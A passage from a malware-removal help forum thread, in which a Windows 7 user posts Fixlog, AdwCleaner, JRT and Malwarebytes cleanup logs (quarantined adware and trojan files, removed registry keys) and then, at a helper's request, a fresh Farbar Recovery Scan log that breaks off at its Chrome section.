"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AC4E5ACF-89F7-4220-BA21-81EE183975E2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC4E5ACF-89F7-4220-BA21-81EE183975E2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Application Experience\AitAgent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CEE64558-E1A7-4D9D-80A7-2001912BE5B5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CEE64558-E1A7-4D9D-80A7-2001912BE5B5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MemoryDiagnostic\CorruptionDetector" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E53E44FB-9B83-426E-A9FB-B394E57995A5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E53E44FB-9B83-426E-A9FB-B394E57995A5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA2BC0A6-8D4B-458A-85C8-2B8C72487513}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA2BC0A6-8D4B-458A-85C8-2B8C72487513}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector" => key removed successfully
C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk => moved successfully
C:\ProgramData\TEMP => ":792D4CF1" ADS removed successfully.
 
========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
 
The operation completed successfully.
 
 
 
========= End of Reg: =========
 
 
========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
 
The operation completed successfully.
 
 
 
========= End of Reg: =========
 
"HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17" => key removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Classes\3e97b17 => could not remove key. ErrorCode: 0xC0000033
HKCU\\software\\qwgcellmqw => key removed successfully
 
========= bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
Unable to cancel {18694ED2-AE4A-4639-836E-B4A3564E5954}.
Unable to cancel {9784D89A-4FA7-4EA8-A833-EEC6367E950C}.
{528CA987-3883-482D-8226-AB8DBB1BF352} canceled.
{B91AE211-7E63-49C5-9C25-E64495076121} canceled.
2 out of 4 jobs canceled.
 
========= End of CMD: =========
 
 
========= netsh winsock reset catalog =========
 
 
Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.
 
 
========= End of CMD: =========
 
 
========= ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 81642502 B
Java, Flash, Steam htmlcache => 10723 B
Windows/system/drivers => 49605860 B
Edge => 0 B
Chrome => 339336822 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83391 B
systemprofile32 => 66356 B
LocalService => 66228 B
NetworkService => 68964 B
Dale => 16075294 B
 
RecycleBin => 699 B
EmptyTemp: => 476.4 MB temporary data Removed.
 
================================
 
The system needed a reboot.
 
==== End of Fixlog 18:40:04 ====
 
The AdwCleaner [C0] log (there wasn't a C1 log)
# AdwCleaner v6.030 - Logfile created 12/11/2016 at 19:02:32
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-12.1 [Server]
# Operating System : Windows 7 Professional Service Pack 1 (X64)
# Username : Dale - FAMROOM2
# Running from : C:\Users\Dale\Desktop\adwcleaner_6.030.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support
 
 
 
***** [ Services ] *****
 
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[-] Folder deleted: C:\Program Files (x86)\Coupons
 
 
***** [ Files ] *****
 
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\astrology.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\astrologyanswers.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\astrologyzone.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\televisionfanatic.com
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Data restored: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Data restored: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Key deleted: HKLM\SOFTWARE\Classes\s
 
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [2766 Bytes] - [12/11/2016 19:02:32]
C:\AdwCleaner\AdwCleaner[S0].txt - [2815 Bytes] - [12/11/2016 19:01:19]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2912 Bytes] ##########
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Professional x64 
Ran by Dale (Administrator) on Sat 11/12/2016 at 19:06:30.49
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 9 
 
Successfully deleted: C:\Windows\couponprinter.ocx (File) 
Successfully deleted: C:\Users\Dale\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\17150S1F (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Dale\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3FRG74GT (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Dale\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AVMH21B0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Dale\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VGM09B9F (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\17150S1F (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3FRG74GT (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AVMH21B0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VGM09B9F (Temporary Internet Files Folder) 
 
 
 
Registry: 3 
 
Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A2792EEC-6618-4C4C-8ECF-B51ECB5DC2A1} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A2792EEC-6618-4C4C-8ECF-B51ECB5DC2A1} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{D53D09FE-B1AC-4EE8-AE26-FD43D8B4B62F} (Registry Value) 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/12/2016 at 19:08:48.00
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/12/2016
Scan Time: 7:27 PM
Logfile: Malwarebytes scan log.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.11.12.10
Rootkit Database: v2016.10.31.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Dale
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 279476
Time Elapsed: 5 min, 35 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 20
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00018287.tmp, Quarantined, [5b0f724dd8c2191d9bcb09f7c43d47b9], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00019827.tmp, Quarantined, [f674e8d7e3b7c96d3135b54bb051f907], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00021979.tmp, Quarantined, [541605baeeac92a47de92ad69f6210f0], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00029409.tmp, Quarantined, [f179209f405add59a3c3ac54867b16ea], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00031096.tmp, Quarantined, [6604b40bedad7bbb3531a65a4bb613ed], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00032444.tmp, Quarantined, [4e1c833ccad01a1c87df7c84bd449b65], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00032465.tmp, Quarantined, [006a7e41821889ad2a3c936d8e73f60a], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00000785.tmp, Quarantined, [2e3ca21d73276bcb5214ac54ce3303fd], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00002882.tmp, Quarantined, [8ae0ecd33f5b979fbaac3fc114ed28d8], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00003602.tmp, Quarantined, [6604724d683243f3ca9cda26c33e23dd], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00004134.tmp, Quarantined, [6406f3cc8a103ff7c99dd32dc73a7888], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00007329.tmp, Quarantined, [4426427dc7d3b77f2b3b24dca160bf41], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00007532.tmp, Quarantined, [2446a41bebaf1b1b353118e88b7659a7], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00008203.tmp, Quarantined, [9cce15aac3d71026590db7497c8536ca], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00008539.tmp, Quarantined, [5c0e3d82a3f71620590d2ad6f60b32ce], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00011171.tmp, Quarantined, [b8b2556a68328ea84e1827d9f8099070], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00012281.tmp, Quarantined, [b9b1536cb2e8ff37c2a450b0f40d6799], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00014757.tmp, Quarantined, [402a4877e8b274c29fc7b54bcb36ec14], 
Trojan.Agent.ENM, C:\Program Files (x86)\Internet Explorer\00015990.tmp, Quarantined, [3d2da31c1a80e84ed591fb0533ce57a9], 
Rootkit.Fileless.MTGen, C:\Users\Dale\AppData\Local\e2f44a7\02ab8e0.bat, Quarantined, [ef7bb9065743a88ede137126e023aa56], 
 
Physical Sectors: 0
(No malicious items detected)
 
(end)

 

That's it.  Thanks again, I really appreciate it!

Dale


  • 0

#4
zep516
Posted 12 November 2016 - 07:49 PM

zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure you checkmark Addition.txt box.
  • Press Scan button.
  • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

  • 0

#5
dalemccollum
Posted 12 November 2016 - 07:56 PM

dalemccollum

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

Here you go:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-11-2016
Ran by Dale (administrator) on FAMROOM2 (12-11-2016 19:54:22)
Running from C:\Users\Dale\Desktop
Loaded Profiles: Dale (Available Profiles: Dale)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Pulse Secure, LLC) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\ns.exe
(LULU SOFTWARE LIMITED) C:\Program Files\Soda PDF Desktop\creator-ws.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\ns.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\ASUS WebStorage\3.0.94.193\ASUSWSShellExt64.dll [2011-04-10] (eCareme Technologies, Inc.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\ASUS WebStorage\3.0.94.193\ASUSWSShellExt64.dll [2011-04-10] (eCareme Technologies, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-11-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{914D5341-FF59-4437-84A4-834F53EAC3C5}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://yahoo.com/
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.ebay.com/
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-03-15] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2009-10-22] (Hewlett-Packard Co.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-10-07] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL [2016-03-15] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-10-07] (Oracle Corporation)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2009-10-22] (Hewlett-Packard Co.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} hxxps://akamaicdn.webex.com/client/WBXclient-T30L10NSP5EP2-10002/webex/ieatgpc1.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://continentalra.clio.medcity.net/dana-cached/sc/JuniperSetupClient.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon [2016-10-15]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Soda PDF Desktop\resources\sodapdfdesktopfirefoxextension
FF Extension: (Soda PDF Desktop Creator) - C:\Program Files\Soda PDF Desktop\resources\sodapdfdesktopfirefoxextension [2016-11-08] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2016-11-04] [not signed]
FF HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-10-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-10-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: Soda PDF Desktop -> C:\Program Files (x86)\Soda PDF Desktop\np-previewer.dll [2016-10-21] (LULU SOFTWARE LIMITED)
FF Plugin HKU\S-1-5-21-2722837513-1420934957-2528714982-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Dale\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-07-12] (Citrix Online)
 
Chrome: 
=======
